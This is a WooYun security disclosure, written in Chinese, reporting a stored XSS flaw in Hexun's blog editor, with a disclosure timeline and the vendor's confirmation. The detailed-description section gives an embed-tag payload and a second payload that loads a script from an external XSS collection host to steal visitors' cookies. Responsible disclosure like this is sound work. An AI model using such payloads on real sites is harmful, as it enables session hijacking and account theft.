漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-041007
漏洞标题:和讯个人博客存储型xss可获取cookie
相关厂商:和讯网
漏洞作者: jadore
提交时间:2013-10-25 17:04
修复时间:2013-12-09 17:05
公开时间:2013-12-09 17:05
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-25: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-09: 细节向公众公开
简要描述:
和讯网创立于1996年,从中国早期金融证券资讯服务脱颖而出,建立了第一个财经资讯垂直网站。经过十六年的专注耕耘,和讯网逐步确立了自己在业内的优势 地位和品牌影响力,成为财经互联网专业、高端及品质的代表。中国互联网信息中心数据显示,和讯网用户中高收入人群高达72%,是互联网平均水平的4倍。
之前分别给和讯提了一个博客标题跟相册的存储型xss,今天再来一发,不过这次出现在正文中,原因就是富文本标签过滤不严格
另外问一句乌云,上次和讯给了我两个6,rank,合计12rank,最后到手的为什么是4啊啊
和讯哥哥,三个洞洞了,求个礼物可以么
详细说明:
和讯网创立于1996年,从中国早期金融证券资讯服务脱颖而出,建立了第一个财经资讯垂直网站。经过十六年的专注耕耘,和讯网逐步确立了自己在业内的优势 地位和品牌影响力,成为财经互联网专业、高端及品质的代表。中国互联网信息中心数据显示,和讯网用户中高收入人群高达72%,是互联网平均水平的4倍。
之前分别给和讯提了一个博客标题跟相册的存储型xss,今天再来一发,不过这次出现在正文中,原因就是富文本表情过滤不严格
首先吐槽一句,目前之前提出的那个标题的xss依旧未处理。
安全重于泰山…
现在开始我们主题。这次不管标题,进入正文,点击代码,输入
<embed src=”javascript:alert(42)”>
如下图,然后保存
这样我们就得到了我们想要的弹框
下一步获取cookie
<embed src=”javascript:var s=document.createElement(‘script’);s.src=’http://xss.tw/4574/’;document.body.appendChild(s);”>
顺道鄙视一下asrc的人,连是不是self-xss都分不清
漏洞证明:
rt
修复方案:
三个洞洞了,求个礼物可以么
版权声明:转载请注明来源 jadore@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2013-10-25 18:22
厂商回复:
感谢告知
最新状态:
暂无